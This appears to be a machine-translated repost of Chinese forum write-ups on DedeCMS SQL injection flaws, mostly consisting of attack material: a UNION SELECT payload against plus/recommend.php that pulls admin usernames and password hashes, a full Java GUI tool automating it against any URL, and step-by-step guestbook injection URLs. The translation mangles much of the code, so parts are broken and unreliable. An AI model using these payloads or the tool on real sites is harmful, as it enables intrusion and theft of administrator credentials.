Introduction to DEDECMS SQL Injection vulnerability using code and tools

Last Update:2017-01-13 Source: Internet

Author: User

Tags foreach addgroup sql injection

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Recently, netizens in Dedecms found a full version of the SQL injection bug, currently the official latest version has fixed the vulnerability, the relevant use of code as follows:

Exp:

Exp:plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\ '
or mid=@ ' \ '/*!50000union*//*!50000select*/1,2,3, (select
CONCAT (0x7c,userid,0x7c,pwd) +from+ '%23@__admin '
limit+0,1), 5,6,7,8,9%23@ ' +&_files[type][name]=1.jpg&_files[type]
[type]=application/octet-stream&_files[type][size]=111
Using the tool source code (by the principal):

Package org.javaweb.dede.ui;

Import Java.awt.Toolkit;
Import Java.io.BufferedReader;
Import Java.io.InputStreamReader;
Import Java.net.URL;
Import Java.util.regex.Matcher;
Import Java.util.regex.Pattern;

/**
*
* @author YZ
*/
public class MainFrame extends Javax.swing.JFrame {

Private static final long serialversionuid = 1L;

/**
* Creates new form MainFrame
*/
Public MainFrame () {
Initcomponents ();
}

public string request (string URL) {
String str = "", TMP;
try {
BufferedReader br = new BufferedReader (new InputStreamReader (URL). OpenStream ());
while ((Tmp=br.readline ())!=null) {
str+=tmp+ "\ r \ n";
}
catch (Exception e) {
Jtextarea1.settext (E.tostring ());
}
return str;
}

private void Initcomponents () {

JPanel1 = new Javax.swing.JPanel ();
JLabel1 = new Javax.swing.JLabel ();
JTextField1 = new Javax.swing.JTextField ();
JButton1 = new Javax.swing.JButton ();
JScrollPane1 = new Javax.swing.JScrollPane ();
JTEXTAREA1 = new Javax.swing.JTextArea ();

Setdefaultcloseoperation (Javax.swing.WindowConstants.EXIT_ON_CLOSE);

Jlabel1.settext ("URL:");
Jtextfield1.settext ("http://localhost");

This.settitle ("Dedecms recommend.php injection Tool-p2j.cn");

int screenwidth = Toolkit.getdefaulttoolkit (). Getscreensize (). width;
int screenheight = Toolkit.getdefaulttoolkit (). Getscreensize (). Height;
This.setbounds (SCREENWIDTH/2-229, SCREENHEIGHT/2-158, 458, 316);

Jbutton1.settext ("get");
Jbutton1.addactionlistener (New Java.awt.event.ActionListener () {
public void actionperformed (Java.awt.event.ActionEvent evt) {
Jbutton1actionperformed (EVT);
}
});

Jtextarea1.setcolumns (20);
Jtextarea1.setrows (5);
Jscrollpane1.setviewportview (JTEXTAREA1);

Javax.swing.GroupLayout jpanel1layout = new Javax.swing.GroupLayout (JPANEL1);
Jpanel1.setlayout (jpanel1layout);
Jpanel1layout.sethorizontalgroup (
Jpanel1layout.createparallelgroup (Javax.swing.GroupLayout.Alignment.LEADING)
. AddGroup (Jpanel1layout.createsequentialgroup ()
. AddGroup (Jpanel1layout.createparallelgroup (Javax.swing.GroupLayout.Alignment.TRAILING, False)
. addcomponent (JScrollPane1, Javax.swing.GroupLayout.Alignment.LEADING)
. AddGroup (Javax.swing.GroupLayout.Alignment.LEADING, Jpanel1layout.createsequentialgroup ()
. Addcontainergap ()
. AddComponent (JLabel1)
. Addpreferredgap (Javax.swing.LayoutStyle.ComponentPlacement.RELATED)
. addcomponent (JTextField1, Javax.swing.GroupLayout.PREFERRED_SIZE, 331, Javax.swing.GroupLayout.PREFERRED_SIZE)
. Addpreferredgap (Javax.swing.LayoutStyle.ComponentPlacement.RELATED)
. addcomponent (JButton1, Javax.swing.GroupLayout.PREFERRED_SIZE, Javax.swing.GroupLayout.PREFERRED_SIZE))
. Addgap (0, 0, Short.max_value))
);
Jpanel1layout.setverticalgroup (
Jpanel1layout.createparallelgroup (Javax.swing.GroupLayout.Alignment.LEADING)
. AddGroup (Jpanel1layout.createsequentialgroup ()
. Addcontainergap ()
. AddGroup (Jpanel1layout.createparallelgroup (Javax.swing.GroupLayout.Alignment.BASELINE)
. AddComponent (JLabel1)
. addcomponent (JTextField1,
Javax.swing.GroupLayout.PREFERRED_SIZE,
Javax.swing.GroupLayout.DEFAULT_SIZE,
Javax.swing.GroupLayout.PREFERRED_SIZE)
. AddComponent (JButton1))
. Addpreferredgap (Javax.swing.LayoutStyle.ComponentPlacement.RELATED)
. addcomponent (JScrollPane1, Javax.swing.GroupLayout.DEFAULT_SIZE, 254, Short.max_value))
);

Javax.swing.GroupLayout layout = new Javax.swing.GroupLayout (Getcontentpane ());
Getcontentpane (). setlayout (layout);
Layout.sethorizontalgroup (
Layout.createparallelgroup (Javax.swing.GroupLayout.Alignment.LEADING)
. addcomponent (JPanel1, Javax.swing.GroupLayout.DEFAULT_SIZE, Javax.swing.GroupLayout.DEFAULT_SIZE, Short.max_ VALUE)
);
Layout.setverticalgroup (
Layout.createparallelgroup (Javax.swing.GroupLayout.Alignment.LEADING)
. addcomponent (JPanel1, Javax.swing.GroupLayout.DEFAULT_SIZE, Javax.swing.GroupLayout.DEFAULT_SIZE, Short.max_ VALUE)
);

Pack ();
}//</editor-fold>

private void Jbutton1actionperformed (Java.awt.event.ActionEvent evt) {
String URL = jtextfield1.gettext ();
if (null==url| | "". Equals (URL)) {
return;
}
String result = Request (url+ "/plus/recommend.php?action=&aid=1&_files[type][tmp_name]=\\%27%20or%20mid=@" \\%27 '%20/*!50000union*//*!50000select*/1,2,3, (Select%20concat (0x7c,userid,0x7c,pwd) +from+ '%23@__admin '% 20limit+0,1), 5,6,7,8,9%23@ ' \\%27 ' +&_files[type][name]=1.jpg&_files[type][type]=application/ octet-stream&_files[type][size]=4294 ");
Matcher m = Pattern.compile ("if (M.find ()) {
String[] s = m.group (1). Split ("\\|");
if (s.length>2) {
Jtextarea1.settext ("UserName:" +s[1]+ "\R\NMD5:" +s[2].substring (3,s[2].length ()-1));
}
}
}

public static void Main (String args[]) {
Java.awt.EventQueue.invokeLater (New Runnable () {
public void Run () {
New MainFrame (). setvisible (True);
}
});
}

Variables declaration-do not modify
Private Javax.swing.JButton JButton1;
Private Javax.swing.JLabel JLabel1;
Private Javax.swing.JPanel JPanel1;
Private Javax.swing.JScrollPane jScrollPane1;
Private Javax.swing.JTextArea jTextArea1;
Private Javax.swing.JTextField jTextField1;
End of variables declaration
}

Please look at the file: include/filter.inc.php

Quote a Gothic word:

This is the source of the 2B dede again variable overwrite vulnerability.

This is to filter or replace illegal keywords. Normal.

/* to _get,_post,_cookie filter * *
foreach (Array (' _get ', ' _post ', ' _cookie ') as $_request)
{
foreach ($$_request as $_k => $_v)
{
${$_k} = _filterall ($_k,$_v);
}
}

Equivalent to a redistribution, the previous filter is not valid.
This is to filter or replace illegal keywords. Normal.

1. In order to effectively prevent the dissemination of reproduced publication
2. Some initial vulnerabilities have to set the point of permissions naturally after everyone wants to get a promotion so as to see a better paste naturally want to get a promotion will have to send their own first good paste so that the natural good paste more.
Do not know if there is no reason, anyway, I think so. Of course, after a period of time will be set to 0 permissions to view. First of all, let some hair good post promotion of the people to see it, just like Wooyun the core to see the ordinary at the beginning of this I think is better!

Vulnerability: DEDECMS 5.7 Latest SQL Vulnerability
Author: Brother Ghost
Copyright: www.90sec.org

To see this sticker you need to ensure that the following points:
1. Guarantee the need for good character
2. Guarantee not to use illegally (leak detection repair do not do bad things) [otherwise the consequences of conceit]
3. Absolute guarantee 100% does not propagate the public reprint (if discovery: dissemination reprint announces) I can only say that I will be very sad! No public loopholes can play on the first play a period of time!
4. Respect for copyright!

Vulnerability file edit.inc.php specific code: <?php

if (!defined (' Dedeinc ')) exit (' Request error! ');

if (!empty ($_cookie[' Guest_book_pos ')) $GUEST _book_pos = $_cookie[' Guest_book_pos '];
else $GUEST _book_pos = "guestbook.php";

$id = Intval ($id);
if (empty ($job)) $job = ' view ';

if ($job = = ' del ' && $g _isadmin)
{
$dsql->executenonequery ("DELETE from ' #@__guestbook ' WHERE id= ' $id '");
ShowMsg ("Delete a message successfully!") ", $GUEST _book_pos);
Exit ();
}
else if ($job = = ' Check ' && $g _isadmin)
{
$dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ischeck=1 WHERE id= ' $id '");
ShowMsg ("Successfully audit a message!") ", $GUEST _book_pos);
Exit ();
}
else if ($job = = ' Editok ')
{
$remsg = Trim ($remsg);
if ($remsg!= ')
{
Admin replies do not filter HTML
if ($g _isadmin)
{
$msg = "<div class=\\ ' rebox\\ ' >". $msg. " </div>\n ". $remsg;
$remsg <br><font color=red> Admin reply:</font>
}
Else
{
$row = $dsql->getone ("Select msg from ' #@__guestbook" WHERE id= ' $id ');
$oldmsg = "<div class=\\ ' rebox\\ ' >". Addslashes ($row [' msg ']). " </div>\n ";
$remsg = Trimmsg (CN_SUBSTRR ($remsg, 1024), 1);
$msg = $oldmsg. $remsg;
}
}
There is no filtering on the $msg, which can inject arbitrary
$dsql->executenonequery ("UPDATE ' #@__guestbook ' SET ' msg ' = ' $msg '), ' posttime ' = '". Time (). "' WHERE id= ' $id ');
ShowMsg ("Successfully change or reply to a message!") ", $GUEST _book_pos);
Exit ();
}

if ($g _isadmin)
{
$row = $dsql->getone ("select * from ' #@__guestbook" WHERE id= ' $id ');
Require_once (dedetemplate. ') /plus/guestbook-admin.htm ');
}
Else
{
$row = $dsql->getone ("Select Id,title from ' #@__guestbook ' WHERE id= ' $id '");
Require_once (dedetemplate. ') /plus/guestbook-user.htm ');
}

The success of the vulnerability requires a condition:
1. PHP Magic_quotes_gpc=off
2. vulnerability file exists plus/guestbook.php Dede_guestbook Table of course also exists.

How to determine if there is a vulnerability:
Open www.xxx.com/plus/guestbook.php First, you can see other people's messages,
Then put the mouse on [reply/edit] to see the ID of someone else's message. Then write down the ID
Visit: www.xxx.com/plus/guestbook.php?action=admin&job=editok&msg=90sec ' &id= presence Message ID
If the dede5.7 version of the submission will appear "a successful change or reply to a message" that will prove that the modification was successful
Jump back to www.xxx.com/plus/guestbook.php to see if you changed the message ID turned 90sec ' if it turns out to be a vulnerability that could not be exploited, you should open PHP for him Magic_quotes_gpc=off
If not modified successfully, the content of the message ID or the previous one to prove that the vulnerability can be exploited.
Then revisit the www.xxx.com/plus/guestbook.php?action=admin&job=editok&id= presence message id&msg= ', Msg=user (), email= '
Then return, the content of that message ID is directly modified to MySQL user ().

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More